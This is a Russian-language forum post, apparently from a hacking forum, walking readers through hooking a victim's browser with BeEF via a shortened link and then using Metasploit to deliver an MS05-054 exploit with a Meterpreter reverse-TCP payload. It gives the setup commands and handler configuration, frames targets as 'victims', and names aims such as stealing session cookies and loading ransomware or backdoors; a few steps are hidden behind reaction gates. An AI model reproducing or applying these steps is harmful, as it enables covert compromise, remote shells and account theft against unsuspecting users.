Jump to content
Search In
  • More options...
Find results that contain...
Find results in...
Sign in to follow this  
mr.save

Взлом устройств

Recommended Posts

Цитата

Каждый раз переходя по ссылке вы можете не подозревать, но на вашем устройстве после перехода могут находится вредоносные программы а ваши персональные данные могут быть похищены.

 

Все действия происходят на OC Kali Linux

Цитата

Перехват куки. И соответственно перехват сессий ваших аккаунтов с браузера.

 

Цитата

Куки — небольшой фрагмент данных, отправленный веб-сервером и хранимый на компьютере пользователя. Веб-клиент всякий раз при попытке открыть страницу соответствующего сайта пересылает этот фрагмент данных веб-серверу в составе HTTP-запроса.

 

Цитата

Ваш IP и другие гео данные.

Цитата

Подгрузить малварь-вымогатель или бэкдор.

 

Exploit pack - это своеобразная связка эксплойтов.

Цитата

Эксплойт — компьютерная программа, фрагмент программного кода или последовательность команд, использующие уязвимости в программном обеспечении и применяемые для проведения атаки на вычислительную систему, простыми словами вирус.

 

Цитата

Beef - это фреймворк для проведения XSS атак путем заражения и дальнейшего использования.

 

Цитата

Metasploit - фреймворк для поиска и эксплуатации уязвимостей. То есть для проведения тестирования на проникновение.

 

Запуск beef.

В терминале пишем

beef-xss

Переходим по ссылке http://127.0.0.1:3000/ui/authentication

Теперь нужно авторизироватся. Логин и пароль по умолчанию beef:beef.

Нам нужно чтобы "жертва" выполнила у себя скрипт hook.js

Нужно подгрузить его ей.

http://<ваш ip>:3000/demos/basic.html

Далее сократите ссылку и скиньте пользователю. Как только он переходит по ссылке на панели управления beef в разделе Online browsers появится активный браузер. Это браузер нашего пользователя.

Половина дел сделано. Теперь подключим к нашей работе metasploit. Для этого:

  1. Открываем файл config.yaml у beef. Часто он находится в этой дериктории - /usr/share/beef-xss/
  2. Ищем там раздел extension. У metasploit меняем значение параметра на true

Скрытый контент

    Дайте реакцию на этот пост, чтобы увидеть скрытый контент.

  1. Теперь же открываем файл /usr/share/beef-xss/extensions/metasploit/config.yaml и изменяем значение параметров у callback_host и host.
  2. Запускаем metasploit и пишем следующее

msf> load msgrpc

Скрытый контент

    Дайте реакцию на этот пост, чтобы увидеть скрытый контент.

И снова открываем файл из пункта 3. В pass вписываем получившийся с генерированный пароль. Остается сохранить.

Переходим в /usr/share/beef-xss/ и пишем

./beef -x

После этого в beef загрузятся exploit'ы.

Теперь нам доступны exploit'ы которые мы тоже подгрузить пользователю и выполнить их. Для начала я хотел бы узнать какая ОС у моего пользователя.

Скрытый контент

    Дайте реакцию на этот пост, чтобы увидеть скрытый контент.

И как видно на скриншоте - это windows.

Теперь переходим во вкладку Commands и ищем - msf_ms05_054_onload

Скрытый контент

    Дайте реакцию на этот пост, чтобы увидеть скрытый контент.

Выберем payload. Так как у моей "жертвы" windows я выбрал - windows/meterpreter/reverse_tcp

Заполняем все поля.

Теперь открываем msf и пишем

1. use exploit/multi/handler

2. set payload windows/meterpreter/reverse_tcp

3. set LHOST <your_ip>

4. exploit

Во второй команде пишете название пайлоада который выбрали в beef.

 

Цитата

Добавив к эксплойту чуточку СИ и ваша жертва взломана, но не стоит забывать что вас также могут взломать,будьте осторожнее.

 

Share this post


Link to post

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Sign in to follow this  

×
×
  • Create New...